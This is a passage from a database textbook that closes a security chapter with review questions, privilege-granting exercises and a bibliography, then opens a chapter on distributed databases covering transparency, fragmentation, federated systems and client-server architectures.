it can be induced, and the various types of risks associated with it. Then we gave an


idea of the various ways SQL injection can be prevented. The issues related to flow
control and the problems associated with covert channels were discussed next, as
well as encryption and public-private key-based infrastructures. The idea of sym-
metric key algorithms and the use of the popular asymmetric key-based public key
infrastructure (PKI) scheme were explained. We also covered the concepts of digital
signatures and digital certificates. We highlighted the importance of privacy issues
and hinted at some privacy preservation techniques. We discussed a variety of chal-
lenges to security including data quality, intellectual property rights, and data sur-
vivability. We ended the chapter by introducing the implementation of security
policies by using a combination of label-based security and virtual private databases
in Oracle 11g.

Review Questions
1. Discuss what is meant by each of the following terms: database authoriza-

tion, access control, data encryption, privileged (system) account, database
audit, audit trail.

2. Which account is designated as the owner of a relation? What privileges does
the owner of a relation have?

3. How is the view mechanism used as an authorization mechanism?

4. Discuss the types of privileges at the account level and those at the relation
level.

5. What is meant by granting a privilege? What is meant by revoking a
privilege?

6. Discuss the system of propagation of privileges and the restraints imposed
by horizontal and vertical propagation limits.

7. List the types of privileges available in SQL.

8. What is the difference between discretionary and mandatory access control?

9. What are the typical security classifications? Discuss the simple security
property and the *-property, and explain the justification behind these rules
for enforcing multilevel security.

10. Describe the multilevel relational data model. Define the following terms:
apparent key, polyinstantiation, filtering.

11. What are the relative merits of using DAC or MAC?

12. What is role-based access control? In what ways is it superior to DAC and
MAC?

13. What are the two types of mutual exclusion in role-based access control?

14. What is meant by row-level access control?

15. What is label security? How does an administrator enforce it?


16. What are the different types of SQL injection attacks?

17. What risks are associated with SQL injection attacks?

18. What preventive measures are possible against SQL injection attacks?

19. What is a statistical database? Discuss the problem of statistical database
security.

20. How is privacy related to statistical database security? What measures can be
taken to ensure some degree of privacy in statistical databases?

21. What is flow control as a security measure? What types of flow control exist?

22. What are covert channels? Give an example of a covert channel.

23. What is the goal of encryption? What process is involved in encrypting data
and then recovering it at the other end?

24. Give an example of an encryption algorithm and explain how it works.

25. Repeat the previous question for the popular RSA algorithm.

26. What is a symmetric key algorithm for key-based security?

27. What is the public key infrastructure scheme? How does it provide security?

28. What are digital signatures? How do they work?

29. What type of information does a digital certificate include?

Exercises
30. How can privacy of data be preserved in a database?

31. What are some of the current outstanding challenges for database security?

32. Consider the relational database schema in Figure A.1 (at the end of this
chapter). Suppose that all the relations were created by (and hence are
owned by) user X, who wants to grant the following privileges to user
accounts A, B, C, D, and E:

a. Account A can retrieve or modify any relation except DEPENDENT and
can grant any of these privileges to other users.

b. Account B can retrieve all the attributes of EMPLOYEE and DEPARTMENT
except for Salary, Mgr_ssn, and Mgr_start_date.

c. Account C can retrieve or modify WORKS_ON but can only retrieve the
Fname, Minit, Lname, and Ssn attributes of EMPLOYEE and the Pname and
Pnumber attributes of PROJECT.

d. Account D can retrieve any attribute of EMPLOYEE or DEPENDENT and
can modify DEPENDENT.

e. Account E can retrieve any attribute of EMPLOYEE but only for
EMPLOYEE tuples that have Dno = 3.

f. Write SQL statements to grant these privileges. Use views where
appropriate.


33. Suppose that privilege (a) of Exercise 32 is to be given with GRANT OPTION
but only so that account A can grant it to at most five accounts, and each of
these accounts can propagate the privilege to other accounts but without the
GRANT OPTION privilege. What would the horizontal and vertical propaga-
tion limits be in this case?

34. Consider the relation shown in Figure 2(d). How would it appear to a user
with classification U? Suppose that a classification U user tries to update the
salary of ‘Smith’ to $50,000; what would be the result of this action?

Selected Bibliography
Authorization based on granting and revoking privileges was proposed for the
SYSTEM R experimental DBMS and is presented in Griffiths and Wade (1976).
Several books discuss security in databases and computer systems in general,
including the books by Leiss (1982a) and Fernandez et al. (1981), and Fugini et al.
(1995). Natan (2005) is a practical book on security and auditing implementation
issues in all major RDBMSs.

Many papers discuss different techniques for the design and protection of statistical
databases. They include McLeish (1989), Chin and Ozsoyoglu (1981), Leiss (1982),
Wong (1984), and Denning (1980). Ghosh (1984) discusses the use of statistical
databases for quality control. There are also many papers discussing cryptography
and data encryption, including Diffie and Hellman (1979), Rivest et al. (1978), Akl
(1983), Pfleeger and Pfleeger (2007), Omura et al. (1990), Stallings (2000), and Iyer
et al. (2004).

Halfond et al. (2006) helps understand the concepts of SQL injection attacks and
the various threats imposed by them. The white paper Oracle (2007a) explains how
Oracle is less prone to SQL injection attack as compared to SQL Server. It also gives
a brief explanation as to how these attacks can be prevented from occurring.
Further proposed frameworks are discussed in Boyd and Keromytis (2004), Halfond
and Orso (2005), and McClure and Krüger (2005).

Multilevel security is discussed in Jajodia and Sandhu (1991), Denning et al. (1987),
Smith and Winslett (1992), Stachour and Thuraisingham (1990), Lunt et al. (1990),
and Bertino et al. (2001). Overviews of research issues in database security are given
by Lunt and Fernandez (1990), Jajodia and Sandhu (1991), Bertino (1998), Castano
et al. (1995), and Thuraisingham et al. (2001). The effects of multilevel security on
concurrency control are discussed in Atluri et al. (1997). Security in next-generation,
semantic, and object-oriented databases is discussed in Rabbiti et al. (1991), Jajodia
and Kogan (1990), and Smith (1990). Oh (1999) presents a model for both discre-
tionary and mandatory security. Security models for Web-based applications and
role-based access control are discussed in Joshi et al. (2001). Security issues for man-
agers in the context of e-commerce applications and the need for risk assessment
models for selection of appropriate security control measures are discussed in


Farahmand et al. (2005). Row-level access control is explained in detail in Oracle
(2007b) and Sybase (2005). The latter also provides details on role hierarchy and
mutual exclusion. Oracle (2009) explains how Oracle uses the concept of identity
management.

Recent advances as well as future challenges for security and privacy of databases are
discussed in Bertino and Sandhu (2005). U.S. Govt. (1978), OECD (1980), and NRC
(2003) are good references on the view of privacy by important government bodies.
Karat et al. (2009) discusses a policy framework for security and privacy. XML and
access control are discussed in Naedele (2003). More details can be found on privacy
preserving techniques in Vaidya and Clifton (2004), intellectual property rights in
Sion et al. (2004), and database survivability in Jajodia et al. (1999). Oracle’s VPD
technology and label-based security is discussed in more detail in Oracle (2007b).

EMPLOYEE(Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)

DEPARTMENT(Dname, Dnumber, Mgr_ssn, Mgr_start_date)

DEPT_LOCATIONS(Dnumber, Dlocation)

PROJECT(Pname, Pnumber, Plocation, Dnum)

WORKS_ON(Essn, Pno, Hours)

DEPENDENT(Essn, Dependent_name, Sex, Bdate, Relationship)

Figure A.1
Schema diagram for the COMPANY relational database schema.


Distributed Databases

In this chapter we direct our attention to distributed databases (DDBs), distributed database management
systems (DDBMSs), and how the client-server architecture is used as a platform for
database application development. Distributed databases bring the advantages of
distributed computing to the database management domain. A distributed com-
puting system consists of a number of processing elements, not necessarily homo-
geneous, that are interconnected by a computer network, and that cooperate in
performing certain assigned tasks. As a general goal, distributed computing systems
partition a big, unmanageable problem into smaller pieces and solve it efficiently in
a coordinated manner. The economic viability of this approach stems from two rea-
sons: more computing power is harnessed to solve a complex task, and each
autonomous processing element can be managed independently to develop its own
applications.

DDB technology resulted from a merger of two technologies: database technology,
and network and data communication technology. Computer networks allow dis-
tributed processing of data. Traditional databases, on the other hand, focus on pro-
viding centralized, controlled access to data. Distributed databases allow an
integration of information and its processing by applications that may themselves
be centralized or distributed.

Several distributed database prototype systems were developed in the 1980s to
address the issues of data distribution, distributed query and transaction process-
ing, distributed database metadata management, and other topics. However, a full-
scale comprehensive DDBMS that implements the functionality and techniques
proposed in DDB research never emerged as a commercially viable product. Most
major vendors redirected their efforts from developing a pure DDBMS product into
developing systems based on client-server concepts, or toward developing technolo-
gies for accessing distributed heterogeneous data sources.

From Chapter 25 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


Organizations continue to be interested in the decentralization of processing (at the
system level) while achieving an integration of the information resources (at the log-
ical level) within their geographically distributed systems of databases, applications,
and users. There is now a general endorsement of the client-server approach to
application development, and the three-tier approach to Web application development.

In this chapter we discuss distributed databases, their architectural variations, and
concepts central to data distribution and the management of distributed data.
Details of the advances in communication technologies facilitating the develop-
ment of DDBs are outside the scope of this text; see the texts on data communica-
tions and networking listed in the Selected Bibliography at the end of this chapter.

Section 1 introduces distributed database management and related concepts.
Sections 2 and 3 introduce different types of distributed database systems and their
architectures, including federated and multidatabase systems. The problems of het-
erogeneity and the needs of autonomy in federated database systems are also high-
lighted. Detailed issues of distributed database design, involving fragmenting of
data and distributing it over multiple sites with possible replication, are discussed in
Section 4. Sections 5 and 6 introduce distributed database query and transaction
processing techniques, respectively. Section 7 gives an overview of the concurrency
control and recovery in distributed databases. Section 8 discusses catalog manage-
ment schemes in distributed databases. In Section 9, we briefly discuss current
trends in distributed databases such as cloud computing and peer-to-peer data-
bases. Section 10 discusses distributed database features of the Oracle RDBMS.
Section 11 summarizes the chapter.

For a short introduction to the topic of distributed databases, Sections 1, 2, and 3
may be covered.

1 Distributed Database Concepts1

We can define a distributed database (DDB) as a collection of multiple logically
interrelated databases distributed over a computer network, and a distributed data-
base management system (DDBMS) as a software system that manages a distrib-
uted database while making the distribution transparent to the user.2

Distributed databases are different from Internet Web files. Web pages are basically
a very large collection of files stored on different nodes in a network—the
Internet—with interrelationships among the files represented via hyperlinks. The
common functions of database management, including uniform query processing
and transaction processing, do not apply to this scenario yet. The technology is,
however, moving in a direction such that distributed World Wide Web (WWW)
databases will become a reality in the future. The proliferation of data at millions of

1The substantial contribution of Narasimhan Srinivasan to this and several other sections in this chapter
is appreciated.
2This definition and discussions in this section are based largely on Ozsu and Valduriez (1999).


Websites in various forms does not qualify as a DDB by the definition given earlier.

1.1 Differences between DDB and Multiprocessor Systems
We need to distinguish distributed databases from multiprocessor systems that use
shared storage (primary memory or disk). For a database to be called distributed,
the following minimum conditions should be satisfied:

■ Connection of database nodes over a computer network. There are multi-
ple computers, called sites or nodes. These sites must be connected by an
underlying communication network to transmit data and commands
among sites, as shown later in Figure 3(c).

■ Logical interrelation of the connected databases. It is essential that the
information in the databases be logically related.

■ Absence of homogeneity constraint among connected nodes. It is not nec-
essary that all nodes be identical in terms of data, hardware, and software.

The sites may all be located in physical proximity—say, within the same building or
a group of adjacent buildings—and connected via a local area network, or they may
be geographically distributed over large distances and connected via a long-haul or
wide area network. Local area networks typically use wireless hubs or cables,
whereas long-haul networks use telephone lines or satellites. It is also possible to use
a combination of networks.

Networks may have different topologies that define the direct communication
paths among sites. The type and topology of the network used may have a signifi-
cant impact on the performance and hence on the strategies for distributed query
processing and distributed database design. For high-level architectural issues, how-
ever, it does not matter what type of network is used; what matters is that each site
be able to communicate, directly or indirectly, with every other site. For the remain-
der of this chapter, we assume that some type of communication network exists
among sites, regardless of any particular topology. We will not address any network-
specific issues, although it is important to understand that for an efficient operation
of a distributed database system (DDBS), network design and performance issues
are critical and are an integral part of the overall solution. The details of the under-
lying communication network are invisible to the end user.

1.2 Transparency
The concept of transparency extends the general idea of hiding implementation
details from end users. A highly transparent system offers a lot of flexibility to the
end user/application developer since it requires little or no awareness of underlying
details on their part. In the case of a traditional centralized database, transparency
simply pertains to logical and physical data independence for application develop-
ers. However, in a DDB scenario, the data and software are distributed over multiple


sites connected by a computer network, so additional types of transparencies are
introduced.

Consider the company database in Figure A.1 in Appendix: Figures at the end of this
chapter. The EMPLOYEE, PROJECT, and WORKS_ON tables may be fragmented
horizontally (that is, into sets of rows, as we will discuss in Section 4) and stored
with possible replication as shown in Figure 1. The following types of transparen-
cies are possible:

■ Data organization transparency (also known as distribution or network
transparency). This refers to freedom for the user from the operational
details of the network and the placement of the data in the distributed sys-
tem. It may be divided into location transparency and naming transparency.
Location transparency refers to the fact that the command used to perform
a task is independent of the location of the data and the location of the node
where the command was issued. Naming transparency implies that once a
name is associated with an object, the named objects can be accessed unam-
biguously without additional specification as to where the data is located.

■ Replication transparency. As we show in Figure 1, copies of the same data
objects may be stored at multiple sites for better availability, performance,
and reliability. Replication transparency makes the user unaware of the exis-
tence of these copies.

[Figure 1: Data distribution and replication among distributed databases. Fragments of the EMPLOYEES, PROJECTS, and WORKS_ON tables are stored, with replication, at five sites connected by a communications network: Chicago (headquarters, holding complete copies), San Francisco, Los Angeles, New York, and Atlanta. For example, the San Francisco site holds the San Francisco and Los Angeles EMPLOYEES fragments, the San Francisco PROJECTS fragment, and the WORKS_ON rows for San Francisco employees.]

■ Fragmentation transparency. Two types of fragmentation are possible.
Horizontal fragmentation distributes a relation (table) into subrelations
that are subsets of the tuples (rows) in the original relation. Vertical frag-
mentation distributes a relation into subrelations where each subrelation is
defined by a subset of the columns of the original relation. A global query by
the user must be transformed into several fragment queries. Fragmentation
transparency makes the user unaware of the existence of fragments. (A small
sketch of the two kinds of fragmentation follows this list.)

■ Other transparencies include design transparency and execution trans-
parency—referring to freedom from knowing how the distributed database
is designed and where a transaction executes.
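To make the two kinds of fragmentation concrete, here is a minimal Python sketch over a few hypothetical EMPLOYEE rows; the attribute values are illustrative, and in a real DDB the fragments are defined and allocated during distributed database design, as discussed in Section 4.

employees = [
    {"Ssn": "111", "Lname": "Wong",   "Salary": 40000, "City": "San Francisco"},
    {"Ssn": "222", "Lname": "Zelaya", "Salary": 25000, "City": "Los Angeles"},
    {"Ssn": "333", "Lname": "Smith",  "Salary": 30000, "City": "San Francisco"},
]

# Horizontal fragment: a subset of the rows, for example the rows allocated
# to the San Francisco site in Figure 1.
sf_fragment = [row for row in employees if row["City"] == "San Francisco"]

# Vertical fragment: a subset of the columns of every row; the key (Ssn) is
# kept in each vertical fragment so that the fragments can be rejoined.
salary_fragment = [{"Ssn": r["Ssn"], "Salary": r["Salary"]} for r in employees]

A global query against EMPLOYEE must then be transformed into fragment queries against sf_fragment (and the fragments at the other sites) or against the vertical fragments, which is exactly what fragmentation transparency hides from the user.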

1.3 Autonomy
Autonomy determines the extent to which individual nodes or DBs in a connected
DDB can operate independently. A high degree of autonomy is desirable for
increased flexibility and customized maintenance of an individual node. Autonomy
can be applied to design, communication, and execution. Design autonomy refers
to independence of data model usage and transaction management techniques
among nodes. Communication autonomy determines the extent to which each
node can decide on sharing of information with other nodes. Execution autonomy
refers to independence of users to act as they please.

1.4 Reliability and Availability
Reliability and availability are two of the most common potential advantages cited
for distributed databases. Reliability is broadly defined as the probability that a sys-
tem is running (not down) at a certain time point, whereas availability is the prob-
ability that the system is continuously available during a time interval. We can
directly relate reliability and availability of the database to the faults, errors, and fail-
ures associated with it. A failure can be described as a deviation of a system’s behav-
ior from that which is specified in order to ensure correct execution of operations.
Errors constitute that subset of system states that causes the failure. Fault is the
cause of an error.

To construct a system that is reliable, we can adopt several approaches. One com-
mon approach stresses fault tolerance; it recognizes that faults will occur, and
designs mechanisms that can detect and remove faults before they can result in a
system failure. Another more stringent approach attempts to ensure that the final
system does not contain any faults. This is done through an exhaustive design
process followed by extensive quality control and testing. A reliable DDBMS toler-
ates failures of underlying components and processes user requests so long as data-
base consistency is not violated. A DDBMS recovery manager has to deal with
failures arising from transactions, hardware, and communication networks.
Hardware failures can either be those that result in loss of main memory contents or
loss of secondary storage contents. Communication failures occur due to errors
associated with messages and line failures. Message errors can include their loss,
corruption, or out-of-order arrival at destination.


1.5 Advantages of Distributed Databases
Organizations resort to distributed database management for various reasons.
Some important advantages are listed below.

1. Improved ease and flexibility of application development. Developing and
maintaining applications at geographically distributed sites of an organiza-
tion is facilitated owing to transparency of data distribution and control.

2. Increased reliability and availability. This is achieved by the isolation of
faults to their site of origin without affecting the other databases connected
to the network. When the data and DDBMS software are distributed over
several sites, one site may fail while other sites continue to operate. Only the
data and software that exist at the failed site cannot be accessed. This
improves both reliability and availability. Further improvement is achieved
by judiciously replicating data and software at more than one site. In a cen-
tralized system, failure at a single site makes the whole system unavailable to
all users. In a distributed database, some of the data may be unreachable, but
users may still be able to access other parts of the database. If the data in the
failed site had been replicated at another site prior to the failure, then the
user will not be affected at all.

3. Improved performance. A distributed DBMS fragments the database by
keeping the data closer to where it is needed most. Data localization reduces
the contention for CPU and I/O services and simultaneously reduces access
delays involved in wide area networks. When a large database is distributed
over multiple sites, smaller databases exist at each site. As a result, local
queries and transactions accessing data at a single site have better perfor-
mance because of the smaller local databases. In addition, each site has a
smaller number of transactions executing than if all transactions are submit-
ted to a single centralized database. Moreover, interquery and intraquery
parallelism can be achieved by executing multiple queries at different sites,
or by breaking up a query into a number of subqueries that execute in paral-
lel. This contributes to improved performance.

4. Easier expansion. In a distributed environment, expansion of the system in
terms of adding more data, increasing database sizes, or adding more proces-
sors is much easier.

The transparencies we discussed in Section 1.2 lead to a compromise between ease
of use and the overhead cost of providing transparency. Total transparency provides
the global user with a view of the entire DDBS as if it is a single centralized system.
Transparency is provided as a complement to autonomy, which gives the users
tighter control over local databases. Transparency features may be implemented as a
part of the user language, which may translate the required services into appropriate
operations. Additionally, transparency impacts the features that must be provided
by the operating system and the DBMS.


1.6 Additional Functions of Distributed Databases
Distribution leads to increased complexity in the system design and implementa-
tion. To achieve the potential advantages listed previously, the DDBMS software
must be able to provide the following functions in addition to those of a centralized
DBMS:

■ Keeping track of data distribution. The ability to keep track of the data dis-
tribution, fragmentation, and replication by expanding the DDBMS catalog.

■ Distributed query processing. The ability to access remote sites and trans-
mit queries and data among the various sites via a communication network.

■ Distributed transaction management. The ability to devise execution
strategies for queries and transactions that access data from more than one
site and to synchronize the access to distributed data and maintain the
integrity of the overall database.

■ Replicated data management. The ability to decide which copy of a repli-
cated data item to access and to maintain the consistency of copies of a repli-
cated data item.

■ Distributed database recovery. The ability to recover from individual site
crashes and from new types of failures, such as the failure of communication
links.

■ Security. Distributed transactions must be executed with the proper man-
agement of the security of the data and the authorization/access privileges of
users.

■ Distributed directory (catalog) management. A directory contains infor-
mation (metadata) about data in the database. The directory may be global
for the entire DDB, or local for each site. The placement and distribution of
the directory are design and policy issues.

These functions themselves increase the complexity of a DDBMS over a centralized
DBMS. Before we can realize the full potential advantages of distribution, we must
find satisfactory solutions to these design issues and problems. Including all this
additional functionality is hard to accomplish, and finding optimal solutions is a
step beyond that.

2 Types of Distributed Database Systems
The term distributed database management system can describe various systems that
differ from one another in many respects. The main thing that all such systems have
in common is the fact that data and software are distributed over multiple sites con-
nected by some form of communication network. In this section we discuss a num-
ber of types of DDBMSs and the criteria and factors that make some of these
systems different.


The first factor we consider is the degree of homogeneity of the DDBMS software.
If all servers (or individual local DBMSs) use identical software and all users
(clients) use identical software, the DDBMS is called homogeneous; otherwise, it is
called heterogeneous. Another factor related to the degree of homogeneity is the
degree of local autonomy. If there is no provision for the local site to function as a
standalone DBMS, then the system has no local autonomy. On the other hand, if
direct access by local transactions to a server is permitted, the system has some
degree of local autonomy.

Figure 2 shows classification of DDBMS alternatives along orthogonal axes of dis-
tribution, autonomy, and heterogeneity. For a centralized database, there is com-
plete autonomy, but a total lack of distribution and heterogeneity (Point A in the
figure). We see that the degree of local autonomy provides further ground for classi-
fication into federated and multidatabase systems. At one extreme of the autonomy
spectrum, we have a DDBMS that looks like a centralized DBMS to the user, with
zero autonomy (Point B). A single conceptual schema exists, and all access to the
system is obtained through a site that is part of the DDBMS—which means that no
local autonomy exists. Along the autonomy axis we encounter two types of
DDBMSs called federated database system (Point C) and multidatabase system
(Point D). In such systems, each server is an independent and autonomous central-
ized DBMS that has its own local users, local transactions, and DBA, and hence has
a very high degree of local autonomy.

[Figure 2: Classification of distributed databases along the dimensions of distribution, autonomy, and heterogeneity. Legend: A = traditional centralized database systems; B = pure distributed database systems; C = federated database systems; D = multidatabase or peer-to-peer database systems.]

The term federated database system (FDBS)
is used when there is some global view or schema of the federation of databases that
is shared by the applications (Point C). On the other hand, a multidatabase system
has full local autonomy in that it does not have a global schema but interactively
constructs one as needed by the application (Point D).3 Both systems are hybrids
between distributed and centralized systems, and the distinction we made between
them is not strictly followed. We will refer to them as FDBSs in a generic sense. Point
D in the diagram may also stand for a system with full local autonomy and full het-
erogeneity—this could be a peer-to-peer database system (see Section 9.2). In a het-
erogeneous FDBS, one server may be a relational DBMS, another a network DBMS
(such as Computer Associates' IDMS or HP's IMAGE/3000), and a third an object
DBMS (such as Object Design’s ObjectStore) or hierarchical DBMS (such as IBM’s
IMS); in such a case, it is necessary to have a canonical system language and to
include language translators to translate subqueries from the canonical language to
the language of each server.

We briefly discuss the issues affecting the design of FDBSs next.

2.1 Federated Database Management Systems Issues
The type of heterogeneity present in FDBSs may arise from several sources. We dis-
cuss these sources first and then point out how the different types of autonomies
contribute to a semantic heterogeneity that must be resolved in a heterogeneous
FDBS.

■ Differences in data models. Databases in an organization come from a vari-
ety of data models, including the so-called legacy models (hierarchical and
network), the relational data model, the object data model, and even files.
The modeling capabilities of the models vary. Hence, to deal with them uni-
formly via a single global schema or to process them in a single language is
challenging. Even if two databases are both from the RDBMS environment,
the same information may be represented as an attribute name, as a relation
name, or as a value in different databases. This calls for an intelligent query-
processing mechanism that can relate information based on metadata.

■ Differences in constraints. Constraint facilities for specification and imple-
mentation vary from system to system. There are comparable features that
must be reconciled in the construction of a global schema. For example, the
relationships from ER models are represented as referential integrity con-
straints in the relational model. Triggers may have to be used to implement
certain constraints in the relational model. The global schema must also deal
with potential conflicts among constraints.

3The term multidatabase system is not easily applicable to most enterprise IT environments. The notion of
constructing a global schema as and when the need arises is not very feasible in practice for enterprise
databases.


■ Differences in query languages. Even with the same data model, the lan-
guages and their versions vary. For example, SQL has multiple versions like
SQL-89, SQL-92, SQL-99, and SQL:2008, and each system has its own set of
data types, comparison operators, string manipulation features, and so on.

Semantic Heterogeneity. Semantic heterogeneity occurs when there are differ-
ences in the meaning, interpretation, and intended use of the same or related data.
Semantic heterogeneity among component database systems (DBSs) creates the
biggest hurdle in designing global schemas of heterogeneous databases. The design
autonomy of component DBSs refers to their freedom of choosing the following
design parameters, which in turn affect the eventual complexity of the FDBS:

■ The universe of discourse from which the data is drawn. For example, for
two customer accounts, databases in the federation may be from the United
States and Japan and have entirely different sets of attributes about customer
accounts required by the accounting practices. Currency rate fluctuations
would also present a problem. Hence, relations in these two databases that
have identical names—CUSTOMER or ACCOUNT—may have some com-
mon and some entirely distinct information.

■ Representation and naming. The representation and naming of data ele-
ments and the structure of the data model may be prespecified for each local
database.

■ The understanding, meaning, and subjective interpretation of data. This is
a chief contributor to semantic heterogeneity.

■ Transaction and policy constraints. These deal with serializability criteria,
compensating transactions, and other transaction policies.

■ Derivation of summaries. Aggregation, summarization, and other data-
processing features and operations supported by the system.

The above problems related to semantic heterogeneity are being faced by all major
multinational and governmental organizations in all application areas. In today’s
commercial environment, most enterprises are resorting to heterogeneous FDBSs,
having heavily invested in the development of individual database systems using
diverse data models on different platforms over the last 20 to 30 years. Enterprises
are using various forms of software—typically called the middleware, or Web-
based packages called application servers (for example, WebLogic or WebSphere)
and even generic systems, called Enterprise Resource Planning (ERP) systems (for
example, SAP, J. D. Edwards ERP)—to manage the transport of queries and transac-
tions from the global application to individual databases (with possible additional
processing for business rules) and the data from the heterogeneous database servers
to the global application. Detailed discussion of these types of software systems is
outside the scope of this text.

Just as providing the ultimate transparency is the goal of any distributed database
architecture, local component databases strive to preserve autonomy.
Communication autonomy of a component DBS refers to its ability to decide
whether to communicate with another component DBS. Execution autonomy
refers to the ability of a component DBS to execute local operations without inter-
ference from external operations by other component DBSs and its ability to decide
the order in which to execute them. The association autonomy of a component
DBS implies that it has the ability to decide whether and how much to share its
functionality (operations it supports) and resources (data it manages) with other
component DBSs. The major challenge of designing FDBSs is to let component
DBSs interoperate while still providing the above types of autonomies to them.

3 Distributed Database Architectures
In this section, we first briefly point out the distinction between parallel and distrib-
uted database architectures. While both are prevalent in industry today, there are
various manifestations of the distributed architectures that are continuously evolv-
ing among large enterprises. The parallel architecture is more common in high-
performance computing, where there is a need for multiprocessor architectures to
cope with the volume of data undergoing transaction processing and warehousing
applications. We then introduce a generic architecture of a distributed database.
This is followed by discussions on the architecture of three-tier client-server and
federated database systems.

3.1 Parallel versus Distributed Architectures
There are two main types of multiprocessor system architectures that are common-
place:

■ Shared memory (tightly coupled) architecture. Multiple processors share
secondary (disk) storage and also share primary memory.

■ Shared disk (loosely coupled) architecture. Multiple processors share sec-
ondary (disk) storage, but each has its own primary memory.

These architectures enable processors to communicate without the overhead of
exchanging messages over a network.4 Database management systems developed
using the above types of architectures are termed parallel database management
systems rather than DDBMSs, since they utilize parallel processor technology.
Another type of multiprocessor architecture is called shared nothing architecture.
In this architecture, every processor has its own primary and secondary (disk)
memory, no common memory exists, and the processors communicate over a high-
speed interconnection network (bus or switch). Although the shared nothing archi-
tecture resembles a distributed database computing environment, major differences
exist in the mode of operation. In shared nothing multiprocessor systems, there is
symmetry and homogeneity of nodes; this is not true of the distributed database
environment where heterogeneity of hardware and operating system at each node is
very common. Shared nothing architecture is also considered as an environment for
parallel databases. Figure 3a illustrates a parallel database (shared nothing), whereas
Figure 3b illustrates a centralized database with distributed access and Figure 3c
shows a pure distributed database. We will not expand on parallel architectures and
related data management issues here.

4If both primary and secondary memories are shared, the architecture is also known as shared everything
architecture.

Figure 3
Some different database system architectures. (a) Shared nothing architecture.
(b) A networked architecture with a centralized database at one of the sites.
(c) A truly distributed database architecture.

Figure 4
Schema architecture of distributed databases: user external views defined over a global
conceptual schema (GCS), which maps to a local conceptual schema (LCS) and a local
internal schema (LIS) at each of sites 1 through n.

3.2 General Architecture of Pure Distributed Databases
In this section we discuss both the logical and component architectural models of a
DDB. In Figure 4, which describes the generic schema architecture of a DDB, the
enterprise is presented with a consistent, unified view showing the logical structure
of underlying data across all nodes. This view is represented by the global concep-
tual schema (GCS), which provides network transparency (see Section 1.2). To
accommodate potential heterogeneity in the DDB, each node is shown as having its
own local internal schema (LIS) based on physical organization details at that par-
ticular site. The logical organization of data at each site is specified by the local con-
ceptual schema (LCS). The GCS, LCS, and their underlying mappings provide the
fragmentation and replication transparency discussed in Section 1.2. Figure 5 shows
the component architecture of a DDB. The global query compiler references the
global conceptual schema from the global system catalog to verify and impose
defined constraints. The global query optimizer references both global and local
conceptual schemas and generates optimized local queries from global queries. It
evaluates all candidate strategies using a cost function that estimates cost based on
response time (CPU, I/O, and network latencies) and estimated sizes of intermedi-

889

Distributed Databases

User

Interactive Global Query

Stored
Data

Global Query Compiler

Global Query Optimizer

Global Transaction Manager

Local Transaction Manager

Local Query
Translation

and Execution

Local
System
Catalog

Stored
Data

Local Transaction Manager

Local Query
Translation

and Execution

Local
System
Catalog

Figure 5
Component architecture
of distributed databases.

ate results. The latter is particularly important in queries involving joins. Having
computed the cost for each candidate, the optimizer selects the candidate with the
minimum cost for execution. Each local DBMS would have their local query opti-
mizer, transaction manager, and execution engines as well as the local system cata-
log, which houses the local schemas. The global transaction manager is responsible
for coordinating the execution across multiple sites in conjunction with the local
transaction manager at those sites.

3.3 Federated Database Schema Architecture
A typical five-level schema architecture to support global applications in the FDBS
environment is shown in Figure 6.

Figure 6
The five-level schema architecture in a federated database system (FDBS).
Source: Adapted from Sheth and Larson, “Federated Database Systems for Managing
Distributed, Heterogeneous, and Autonomous Databases.” ACM Computing Surveys
(Vol. 22: No. 3, September 1990).

In this architecture, the local schema is the conceptual schema (full database
definition) of a component database, and the
component schema is derived by translating the local schema into a canonical data
model or common data model (CDM) for the FDBS. Schema translation from the
local schema to the component schema is accompanied by generating mappings to
transform commands on a component schema into commands on the corres-
ponding local schema. The export schema represents the subset of a component
schema that is available to the FDBS. The federated schema is the global schema or
view, which is the result of integrating all the shareable export schemas. The
external schemas define the schema for a user group or an application, as in the
three-level schema architecture.5

All the problems related to query processing, transaction processing, directory and
metadata management, and recovery apply to FDBSs with additional considera-
tions. It is not within our scope to discuss them in detail here.

5For a detailed discussion of the autonomies and the five-level architecture of FDBMSs, see Sheth and
Larson (1990).

Figure 7
The three-tier client-server architecture. The client (user interface or presentation
tier: Web browser, HTML, JavaScript, Visual Basic, ...) communicates via the HTTP
protocol with the application server (application or business logic tier: application
programs in Java, C/C++, C#, ...), which accesses the database server (query and
transaction processing tier: database access via SQL, PSM, XML, ...) through ODBC,
JDBC, SQL/CLI, or SQLJ.

3.4 An Overview of Three-Tier Client-Server Architecture
As we pointed out in the chapter introduction, full-scale DDBMSs have not been
developed to support all types of DDBMS functionality. Instead, distributed database
applications are being developed in the context of client-server architectures.
Although a two-tier client-server architecture can be used, it is now more common to use a
three-tier architecture, particularly in Web applications. This architecture is illus-
trated in Figure 7.

In the three-tier client-server architecture, the following three layers exist:

1. Presentation layer (client). This provides the user interface and interacts
with the user. The programs at this layer present Web interfaces or forms to
the client in order to interface with the application. Web browsers are often
utilized, and the languages and specifications used include HTML, XHTML,
CSS, Flash, MathML, Scalable Vector Graphics (SVG), Java, JavaScript,
Adobe Flex, and others. This layer handles user input, output, and naviga-
tion by accepting user commands and displaying the needed information,
usually in the form of static or dynamic Web pages. The latter are employed
when the interaction involves database access. When a Web interface is used,
this layer typically communicates with the application layer via the HTTP
protocol.

2. Application layer (business logic). This layer programs the application
logic. For example, queries can be formulated based on user input from the
client, or query results can be formatted and sent to the client for presenta-
tion. Additional application functionality can be handled at this layer, such

892

Distributed Databases

as security checks, identity verification, and other functions. The application
layer can interact with one or more databases or data sources as needed by
connecting to the database using ODBC, JDBC, SQL/CLI, or other database
access techniques.

3. Database server. This layer handles query and update requests from the
application layer, processes the requests, and sends the results. Usually SQL is
used to access the database if it is relational or object-relational, and stored
database procedures may also be invoked. Query results (and queries) may
be formatted into XML when transmitted between the application server
and the database server.

Exactly how to divide the DBMS functionality between the client, application
server, and database server may vary. The common approach is to include the func-
tionality of a centralized DBMS at the database server level. A number of relational
DBMS products have taken this approach, where an SQL server is provided. The
application server must then formulate the appropriate SQL queries and connect to
the database server when needed. The client provides the processing for user inter-
face interactions. Since SQL is a relational standard, various SQL servers, possibly
provided by different vendors, can accept SQL commands through standards such
as ODBC, JDBC, and SQL/CLI.

In this architecture, the application server may also refer to a data dictionary that
includes information on the distribution of data among the various SQL servers, as
well as modules for decomposing a global query into a number of local queries that
